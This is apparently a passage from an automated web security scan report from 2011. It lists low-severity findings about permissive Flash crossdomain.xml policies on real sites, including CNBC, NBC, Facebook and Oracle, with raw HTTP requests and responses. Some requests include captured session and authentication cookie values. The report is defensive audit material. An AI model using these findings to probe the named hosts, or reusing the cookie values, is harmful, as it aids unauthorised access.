HTTP/1.1 200 OK Content-Length: 526 Content-Type: text/xml Content-Location: http://server.iad.liveperson.net/crossdomain.xml Last-Modified: Thu, 23 Oct 2008 22:13:48 GMT Accept-Ranges: bytes ETag: "076249f5c35c91:100b" Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Date: Tue, 06 Sep 2011 15:32:31 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <site-control permitted-cross-domain-policies="all"...[SNIP]... <allow-access-from domain="*.neogames-tech.com " secure="false" />...[SNIP]... <allow-access-from domain="secure.neogames-tech.com " secure="false"/>...[SNIP]... <allow-access-from domain="secure.qa.neogames-tech.com " secure="false"/>...[SNIP]... <allow-access-from domain="secure.st.neogames-tech.com " secure="false"/>...[SNIP]...
4.106. http://snas.nbcuni.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://snas.nbcuni.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: snas.nbcuni.com
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:00:29 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30 Last-Modified: Fri, 17 Dec 2010 18:25:22 GMT ETag: "2c9cd-58b-4979f4b136880" Accept-Ranges: bytes Content-Length: 1419 Cache-Control: max-age=10 Expires: Tue, 06 Sep 2011 15:00:39 GMT Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy><allow-access-from domain="*.ivillage.com " /><allow-access-from domain="*.nbbcdev.com " /><allow-access-from domain="*.bravotv.com " /><allow-access-from domain="*.console.net " /><allow-access-from domain="*.digphilly.com "/><allow-access-from domain="*.nbc10rss.com "/><allow-access-from domain="*.nbc10.com "/><allow-access-from domain="*.scifi.com "/><allow-access-from domain="*.weatherplus.com " /><allow-access-from domain="*.nbcuxd.com " /><allow-access-from domain="vplayer-preview-dev.nbcuni.ge.com " /><allow-access-from domain="*.industrynext.com "/><allow-access-from domain="*.nbcuni.com "/><allow-access-from domain="widgets.nbcuni.com "/><allow-access-from domain="*.nbc.com "/><allow-access-from domain="*.thetonightshowwithconan.com "/><allow-access-from domain="*.tonightshowwithconanobrien.com "/><allow-access-from domain="*.thetonightshowwithconanobrien.com "/><allow-access-from domain="*.tonightshow.com " /><allow-access-from domain="*.tonightshowwithconan.com " /><allow-access-from domain="*.latenightwithjimmyfallon.com " /><allow-access-from domain="*.ingaylewetrust.com " /><allow-access-from domain="*.thejaylenoshow.com " /><allow-access-from domain="127.0.0.1 "/><allow-access-from domain="localhost "/><allow-access-from domain="*.sudjam.com "/>...[SNIP]...
4.107. https://support.oracle.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://support.oracle.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /crossdomain.xml HTTP/1.0 Host: support.oracle.com
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:11:15 GMT Server: Oracle-Application-Server-11g Last-Modified: Sat, 13 Aug 2011 04:17:35 GMT ETag: "1827ecc-f6-4aa5b4f3d35c0" Accept-Ranges: bytes Content-Length: 246 Vary: Accept-Encoding Cache-Control: no-store,max-age=0,must-revalidate Keep-Alive: timeout=15, max=1799 Connection: close Content-Type: application/xml Content-Language: en <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*.oracle.com " secure="true" /> <allow-http-request-headers-from domain="*.oracle.com" secure="true" headers="ORA_MOS_LOC...[SNIP]...
4.108. http://symlookup.cnbc.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://symlookup.cnbc.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.1 Host: symlookup.cnbc.com Proxy-Connection: keep-alive Referer: http://quote.cnbc.com/quoteproxy.swf User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339024957; s_sq=%5B%5BB%5D%5D; __qseg=Q_D
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.27 Content-Type: application/xml Content-Length: 299 X-Aicache-OS: 64.210.193.218:80 Expires: Tue, 06 Sep 2011 15:02:33 GMT Date: Tue, 06 Sep 2011 14:57:09 GMT Connection: close <?xml version="1.0"?> <!-- http://stage.ticker.cnbc.com/crossdomain.xml --> <cross-domain-policy> <allow-access-from domain="www.cnbc.com " /> <allow-access-from domain="*.cnbc.com " /> <allow-access-from domain="www.msn.com " /> <allow-access-from domain="*.msn.com " />...[SNIP]...
4.109. http://videometa.cnbc.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://videometa.cnbc.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.1 Host: videometa.cnbc.com Proxy-Connection: keep-alive Referer: http://quote.cnbc.com/quoteproxy.swf User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; __qseg=Q_D; s_nr=1315338989816; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CNews%25257CAllT%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257B%252520cnbc_multionclick%252528%252527http%25253A//www.cnbc.com/%252527%252529%25253B%25257D%2526oidt%253D2%2526ot%253DDIV
Response
HTTP/1.1 200 OK Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.27 Content-Type: application/xml Content-Length: 462 X-Aicache-OS: 64.210.193.215:80 Cache-Control: max-age=600 Expires: Tue, 06 Sep 2011 15:06:36 GMT Date: Tue, 06 Sep 2011 14:56:36 GMT Connection: close <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="www.cnbc.com " /> <allow-access-from domain="*.cnbc.com " /> <allow-access-from domain="www.msn.com " /> <allow-access-from domain="*.msn.com " /> <allow-access-from domain="video.nbcuni.com " /> <allow-access-from domain="*.video.nbcuni.com " /> <allow-access-from domain="widgets.nbcuni.com " /> <allow-access-from domain="*.widgets.nbcuni.com " />...[SNIP]...
4.110. http://w.sharethis.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://w.sharethis.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: w.sharethis.com
Response
HTTP/1.0 200 OK Server: nginx/0.8.53 Content-Type: text/xml Content-Length: 330 Last-Modified: Mon, 29 Aug 2011 16:55:44 GMT Accept-Ranges: bytes Date: Tue, 06 Sep 2011 16:46:55 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <site-control permitted-cross-domain-policies="master-only" ...[SNIP]... <allow-access-from domain="*.meandmybadself.com " /> <allow-access-from domain="*.sharethis.com " />...[SNIP]...
4.111. http://wd.sharethis.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://wd.sharethis.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: wd.sharethis.com
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Tue, 06 Sep 2011 15:32:10 GMT Content-Type: text/xml Content-Length: 330 Last-Modified: Mon, 29 Aug 2011 16:55:44 GMT Connection: close Accept-Ranges: bytes <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <site-control permitted-cross-domain-policies="master-only" ...[SNIP]... <allow-access-from domain="*.meandmybadself.com " /> <allow-access-from domain="*.sharethis.com " />...[SNIP]...
4.112. http://www.apture.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.apture.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.apture.com
Response
HTTP/1.0 200 OK Last-Modified: Sat, 03 Sep 2011 01:16:29 GMT Content-Length: 366 Content-Type: text/xml P3p: CP="NON CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa HISa OUR LEG UNI COM NAV INT" Vary: Accept-Encoding Date: Tue, 06 Sep 2011 15:33:01 GMT <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="*.apture.com " /> <allow-access-from domain="*.sharlinx.com " /> <allow-access-from domain="apture.com " /> <allow-access-from domain="sharlinx.com " />...[SNIP]...
4.113. http://www.atg.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.atg.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.atg.com
Response
HTTP/1.0 200 OK Server: Apache Last-Modified: Mon, 19 Jul 2010 15:33:33 GMT ETag: "6009a-128-48bbf4a92ed40" Pragma: no-cache Content-Type: text/xml Cache-Control: private, no-cache, no-store, no-transform, proxy-revalidate Date: Tue, 06 Sep 2011 15:32:21 GMT Content-Length: 296 Connection: close <?xml version="1.0" ?> <!-- http://www.atg.com/crossdomain.xml --> <cross-domain-policy> <site-control permitted-cross-domain-policies="master-only"/> <allow-access-from domain="*.atg.com "/> <...[SNIP]...
4.114. https://www.atg.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://www.atg.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.atg.com
Response
HTTP/1.0 200 OK Server: Apache Last-Modified: Mon, 19 Jul 2010 15:33:33 GMT ETag: "6009a-128-48bbf4a92ed40" Pragma: no-cache Content-Type: text/xml Cache-Control: private, no-cache, no-store, no-transform, proxy-revalidate Date: Tue, 06 Sep 2011 15:37:32 GMT Content-Length: 296 Connection: close <?xml version="1.0" ?> <!-- http://www.atg.com/crossdomain.xml --> <cross-domain-policy> <site-control permitted-cross-domain-policies="master-only"/> <allow-access-from domain="*.atg.com "/> <...[SNIP]...
4.115. http://www.cnbc.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.cnbc.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.1 Host: www.cnbc.com Proxy-Connection: keep-alive Referer: http://media.cnbc.com/i/CNBC/Components/Promos/_app/promoBox_noBevelAuto.swf?delay=0&config=24596694&v=8 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TZM=-300; __qca=P0-1380789371-1315338919989; snas_noinfo=1; cnbc_regional_cookie=US; xaikeeperua=yes; cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zcZRSv7js4augxEbn8T3e084iWrP3zZjGLW8rjUsginb4%3d; cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7FjEBYL11GHn8=; s_cc=true; s_sq=%5B%5BB%5D%5D; adops_master_kvs=; s_nr=1315339005443; __qseg=Q_D
Response
HTTP/1.1 200 OK Content-Type: text/xml Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Tue, 06 Sep 2011 14:56:55 GMT Via: 1.1 C aicache6 Content-Length: 3839 X-Aicache-OS: 65.55.53.237:80 Connection: Keep-Alive Keep-Alive: max=20 Expires: Tue, 06 Sep 2011 14:57:55 GMT <?xml version="1.0"?> <!-- http://www.msnbc.com/crossdomain.xml --> <cross-domain-policy> <allow-access-from domain="nbcsports.com " /> <allow-access-from domain="nbcsports.msnbc.com " /> <allow-access-from domain="*.nbcsports.com " /> <allow-access-from domain="*.nbcsports.msnbc.com " /> <allow-access-from domain="*.msnbc.com " secure="false" />...[SNIP]... <allow-access-from domain="*.msn.com " secure="false" />...[SNIP]... <allow-access-from domain="*.msnbc.msn.com " secure="false" />...[SNIP]... <allow-access-from domain="msnbciweb " /> <allow-access-from domain="*.ivillage.com " /> <allow-access-from domain="i.ivillage.com " /> <allow-access-from domain="devi.ivillage.com " /> <allow-access-from domain="*.nbcuni.com " /> <allow-access-from domain="*.newsweek.com "/> <allow-access-from domain="*.washingtonpost.com "/> <allow-access-from domain="*.brightcove.com "/> <allow-access-from domain="*.feedburner.com "/> <allow-access-from domain="msnbc-xpress " />...[SNIP]... <allow-access-from domain="*.cnbc.com "/> <allow-access-from domain="widgets.nbcuni.com "/> <allow-access-from domain="*.thenbcagency.com "/> <allow-access-from domain="*.veoh.com "/> <allow-access-from domain="*.imeem.com "/> <allow-access-from domain="*.livejournal.com "/> <allow-access-from domain="*.vox.com "/> <allow-access-from domain="*.sixapart.com "/> <allow-access-from domain="*.reuters.com "/> <allow-access-from domain="*.real.com "/> <allow-access-from domain="*.akamai.net "/> <allow-access-from domain="*.atlasrichmedia.co.au "/> <allow-access-from domain="*.atlasrichmedia.co.uk "/> <allow-access-from domain="*.atlasrichmedia.com "/> <allow-access-from domain="*.atdmt.com "/> <allow-access-from domain="*.eyeblasterwiz.com "/> <allow-access-from domain="*.serving-sys.com "/> <allow-access-from domain="*.Abc.com "/> <allow-access-from domain="*.Abcnews.com "/> <allow-access-from domain="*.Accuweather.com "/> <allow-access-from domain="*.Cbs.com "/> <allow-access-from domain="*.cbsnews.com "/> <allow-access-from domain="*.discovery.com "/> <allow-access-from domain="*.ew.com "/> <allow-access-from domain="*.fox.com "/> <allow-access-from domain="*.foxnews.com "/> <allow-access-from domain="*.ign.com "/> <allow-access-from domain="*.people.com "/> <allow-access-from domain="*.tvguide.com "/> <allow-access-from domain="*.weather.com "/> <allow-access-from domain="*.vh1.com "/> <allow-access-from domain="*.usatoday.com "/> <allow-access-from domain="*.bmg.com "/> <allow-access-from domain="*.bmgmusic.com "/> <allow-access-from domain="*.people.com "/> <allow-access-from domain="*.fluid.nl "/> <allow-access-from domain="*.myspace.com "/> <allow-access-from domain="*.myspacecdn.com "/> <allow-access-from domain="*.newsvine.com "/> <allow-access-from domain="*.stamen.com " /> <allow-access-from domain="64.207.156.207 "/> <allow-access-from domain="*.msnbcmedia.msn.com " secure="false" />...[SNIP]... <allow-access-from domain="msnbcmedia.msn.com " secure="false" />...[SNIP]... <allow-access-from domain="*.s-msn.com " /> <allow-access-from domain="*.telemundo.com " /> <allow-access-from domain="*.unicornmedia.com " /> <allow-access-from domain="*.pointroll.com " /> <allow-access-from domain="*.intellitxt.com "/> <allow-access-from domain="*.panachetech.com "/> <allow-access-from domain="*.interpolls.com "/> <allow-access-from domain="*.unicornmedia.com " secure="false"/>...[SNIP]... <allow-access-from domain="*.unicornapp.com " secure="false"/>...[SNIP]... <allow-access-from domain="*.unicornmediabeta.com " secure="false"/>...[SNIP]... <allow-access-from domain="today.com " /> <allow-access-from domain="*.today.com " /> <allow-access-from domain="*.pointroll.net " /> <allow-access-from domain="*.imwx.com " />...[SNIP]...
4.116. http://www.csc.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.csc.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.csc.com
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:57:42 GMT Server: Apache Last-Modified: Thu, 03 Jun 2010 17:38:44 GMT Accept-Ranges: bytes Content-Length: 256 Cache-Control: max-age=86400 Expires: Wed, 07 Sep 2011 15:57:42 GMT Connection: close Content-Type: application/xml <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="*.csc.com " /> <allow-access-from domain="assets1.csc.com " />...[SNIP]...
4.117. http://www.deloitte.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.deloitte.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.deloitte.com
Response
HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Sat, 09 Jul 2011 09:03:24 GMT Accept-Ranges: bytes ETag: "3d5248f173ecc1:e97" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 06 Sep 2011 15:56:56 GMT Content-Length: 195 Connection: close ...<cross-domain-policy> <allow-access-from domain="*.deloitte.com " /> <allow-access-from domain="*.tohmatsu.com " /> <allow-access-from domain="*.brightcove.com " /> </cross-domain-policy>
4.118. http://www.facebook.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.facebook.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.facebook.com
Response
HTTP/1.0 200 OK Content-Type: text/x-cross-domain-policy;charset=utf-8 X-FB-Server: 10.64.80.38 Connection: close Content-Length: 1527 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <site-control permitted-cross-domain-policies="master-only" /...[SNIP]... <allow-access-from domain="s-static.facebook.com " /> <allow-access-from domain="static.facebook.com " /> <allow-access-from domain="static.api.ak.facebook.com " /> <allow-access-from domain="*.static.ak.facebook.com " /> <allow-access-from domain="s-static.thefacebook.com " /> <allow-access-from domain="static.thefacebook.com " /> <allow-access-from domain="static.api.ak.thefacebook.com " /> <allow-access-from domain="*.static.ak.thefacebook.com " /> <allow-access-from domain="*.static.ak.fbcdn.com " /> <allow-access-from domain="s-static.ak.fbcdn.net " /> <allow-access-from domain="*.static.ak.fbcdn.net " /> <allow-access-from domain="s-static.ak.facebook.com " />...[SNIP]... <allow-access-from domain="www.new.facebook.com " /> <allow-access-from domain="register.facebook.com " /> <allow-access-from domain="login.facebook.com " /> <allow-access-from domain="ssl.facebook.com " /> <allow-access-from domain="secure.facebook.com " /> <allow-access-from domain="ssl.new.facebook.com " /> <allow-access-from domain="static.ak.fbcdn.net " /> <allow-access-from domain="fvr.facebook.com " /> <allow-access-from domain="www.latest.facebook.com " /> <allow-access-from domain="www.inyour.facebook.com " /> <allow-access-from domain="www.beta.facebook.com " />...[SNIP]...
4.119. http://www.fetchback.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.fetchback.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.fetchback.com
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:00:16 GMT Server: Apache/2.2.3 (Red Hat) Last-Modified: Fri, 30 Apr 2010 21:39:42 GMT Accept-Ranges: bytes Content-Length: 328 Cache-Control: max-age=0 Expires: Tue, 06 Sep 2011 15:00:16 GMT Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <!-- Begin FetchBack Cross Domain Policy Entry --> <allow-access-from domain="*.fetchback.com " to-ports="80" />...[SNIP]...
4.120. http://www.marykay.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.marykay.com
Response
HTTP/1.1 200 OK Content-Length: 142 Content-Type: text/xml Last-Modified: Thu, 02 Jun 2011 09:18:10 GMT Accept-Ranges: bytes ETag: "33c39dfd521cc1:d826e" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: TLTHID=964365EE47EE74B09594D9AC3B884E28; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:45 GMT Connection: close Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:45 GMT; path=/ <cross-domain-policy> <allow-access-from domain="*.ai-media.com " /> <allow-access-from domain="*.marykay.com " /> </cross-domain-policy>
4.121. http://www.msnbc.msn.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.msnbc.msn.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.1 Host: www.msnbc.msn.com Proxy-Connection: keep-alive Referer: http://quote.cnbc.com/quoteproxy.swf User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1162228222-1314847229546; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; Sample=3; TOptOut=1; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Tue, 31 May 2011 22:37:42 GMT Accept-Ranges: bytes ETag: "0ff4d5ae31fcc1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Content-Length: 3839 Cache-Control: max-age=86 Expires: Tue, 06 Sep 2011 15:07:00 GMT Date: Tue, 06 Sep 2011 15:05:34 GMT Connection: close Vary: Accept-Encoding Set-Cookie: SSLB=0; path=/; domain=.msnbc.msn.com <?xml version="1.0"?> <!-- http://www.msnbc.com/crossdomain.xml --> <cross-domain-policy> <allow-access-from domain="nbcsports.com " /> <allow-access-from domain="nbcsports.msnbc.com " /> <allow-access-from domain="*.nbcsports.com " /> <allow-access-from domain="*.nbcsports.msnbc.com " /> <allow-access-from domain="*.msnbc.com " secure="false" />...[SNIP]... <allow-access-from domain="*.msn.com " secure="false" />...[SNIP]... <allow-access-from domain="*.msnbc.msn.com " secure="false" />...[SNIP]... <allow-access-from domain="msnbciweb " /> <allow-access-from domain="*.ivillage.com " /> <allow-access-from domain="i.ivillage.com " /> <allow-access-from domain="devi.ivillage.com " /> <allow-access-from domain="*.nbcuni.com " /> <allow-access-from domain="*.newsweek.com "/> <allow-access-from domain="*.washingtonpost.com "/> <allow-access-from domain="*.brightcove.com "/> <allow-access-from domain="*.feedburner.com "/> <allow-access-from domain="msnbc-xpress " /> <allow-access-from domain="www.cnbc.com "/> <allow-access-from domain="*.cnbc.com "/> <allow-access-from domain="widgets.nbcuni.com "/> <allow-access-from domain="*.thenbcagency.com "/> <allow-access-from domain="*.veoh.com "/> <allow-access-from domain="*.imeem.com "/> <allow-access-from domain="*.livejournal.com "/> <allow-access-from domain="*.vox.com "/> <allow-access-from domain="*.sixapart.com "/> <allow-access-from domain="*.reuters.com "/> <allow-access-from domain="*.real.com "/> <allow-access-from domain="*.akamai.net "/> <allow-access-from domain="*.atlasrichmedia.co.au "/> <allow-access-from domain="*.atlasrichmedia.co.uk "/> <allow-access-from domain="*.atlasrichmedia.com "/> <allow-access-from domain="*.atdmt.com "/> <allow-access-from domain="*.eyeblasterwiz.com "/> <allow-access-from domain="*.serving-sys.com "/> <allow-access-from domain="*.Abc.com "/> <allow-access-from domain="*.Abcnews.com "/> <allow-access-from 